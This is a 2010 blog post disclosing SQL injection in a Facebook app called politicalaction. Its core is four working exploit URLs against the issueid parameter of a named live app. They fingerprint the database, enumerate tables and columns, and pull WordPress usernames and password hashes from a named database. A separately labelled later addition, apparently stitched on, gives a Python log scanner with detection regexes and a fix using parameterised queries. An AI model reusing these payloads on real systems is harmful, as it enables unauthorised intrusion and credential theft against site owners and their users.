FbAppz-BugReport

Tuesday, July 20, 2010

Facebook politicalaction app Sqli Exploit

The Facebook politicalaction app suffers from SQL injection (SQLi) in the issueid parameter of issue.php, which can reveal a lot of information to an attacker.

Here are a few codes which I am posting:

1. Getting basic info:
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1%3D2+UNION+SELECT+1%2CCONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--+1

2. Getting the list of tables:
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1%3D2+UNION+SELECT+1%2C2%2C3%2C4%2Cconcat(table_schema,0x3a,table_name),6,7,8,9,10+FROM+information_schema.tables+WHERE+table_schema+!= 0x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61--+1

3. Getting the columns:
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1%3D2+UNION+SELECT+1%2C2%2C3%2C4%2Cconcat(table_schema,0x3a,table_name,0x3a,column_name),6,7,8,9,10+FROM+information_schema.columns+WHERE+table_schema+!= 0x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61--+1

4. Getting WordPress user-names and passwords:
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1%3D2+UNION+SELECT+1%2C2%2C3%2C4%2Cconcat(user_login,0x3a,user_pass),6,7,8,9,10+from+candukincaid.wp_users--+1
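As an added defensive example (not part of the original post), the following Python log scanner decodes the query string of each request and flags the signals present in the four requests above: UNION SELECT, a boolean probe such as "and 1=2", information_schema, hex literals, a trailing "--" comment, and a non-integer issueid. The access-log lines are constructed; their request paths reuse the query strings quoted in the post, with the literal space written as %20 as a browser would send it.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache-style access log (not from the original post). Requests 2-5
# reuse the query strings of the four URLs quoted above; the literal space in
# two of them is written as %20, which is how a browser would send it.
SAMPLE_LOG = """\
203.0.113.5 - - [20/Jul/2010:20:40:01 +0000] "GET /politicalaction/issue.php?issueid=1 HTTP/1.1" 200 5120
203.0.113.5 - - [20/Jul/2010:20:40:07 +0000] "GET /politicalaction/issue.php?issueid=1+and+1%3D2+UNION+SELECT+1%2CCONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--+1 HTTP/1.1" 200 5210
203.0.113.5 - - [20/Jul/2010:20:41:12 +0000] "GET /politicalaction/issue.php?issueid=1+and+1%3D2+UNION+SELECT+1%2C2%2C3%2C4%2Cconcat(table_schema,0x3a,table_name),6,7,8,9,10+FROM+information_schema.tables+WHERE+table_schema+!=%200x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61--+1 HTTP/1.1" 200 9300
203.0.113.5 - - [20/Jul/2010:20:42:30 +0000] "GET /politicalaction/issue.php?issueid=1+and+1%3D2+UNION+SELECT+1%2C2%2C3%2C4%2Cconcat(table_schema,0x3a,table_name,0x3a,column_name),6,7,8,9,10+FROM+information_schema.columns+WHERE+table_schema+!=%200x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61--+1 HTTP/1.1" 200 14100
203.0.113.5 - - [20/Jul/2010:20:44:05 +0000] "GET /politicalaction/issue.php?issueid=1+and+1%3D2+UNION+SELECT+1%2C2%2C3%2C4%2Cconcat(user_login,0x3a,user_pass),6,7,8,9,10+from+candukincaid.wp_users--+1 HTTP/1.1" 200 5600
"""

# Signals, checked against the decoded parameter value, that mark a UNION-based probe.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.I),
    "boolean_probe": re.compile(r"\b(?:and|or)\b\s*\d+\s*=\s*\d+", re.I),
    "schema_probe": re.compile(r"\binformation_schema\b", re.I),
    "db_fingerprint": re.compile(r"\b(?:user|database|version)\s*\(", re.I),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{2,}", re.I),
    "comment_tail": re.compile(r"--\s*\S*$"),
}
INT_PARAMS = {"issueid"}  # parameters the application expects to be plain integers
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def analyze_uri(uri):
    """Decode the query string and return the signals found in its values."""
    reasons = []
    for name, values in parse_qs(urlsplit(uri).query, keep_blank_values=True).items():
        for value in values:  # parse_qs already turned '+' and %XX back into text
            if name in INT_PARAMS and not value.strip().isdigit():
                reasons.append(f"non_integer_{name}")
            for label, pattern in SIGNATURES.items():
                if pattern.search(value) and label not in reasons:
                    reasons.append(label)
    return reasons

def scan_log(text):
    """Return one finding per request line whose query string raises a signal."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        reasons = analyze_uri(match.group(1))
        if reasons:
            findings.append({"line": line_no, "uri": match.group(1), "reasons": reasons})
    return findings
```

The non-integer check on issueid is also the simplest fix on the application side: reject anything that is not an integer and bind the value through a parameterised query instead of concatenating it into SQL.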
Posted by OpenMindLeader at 8:48 PM
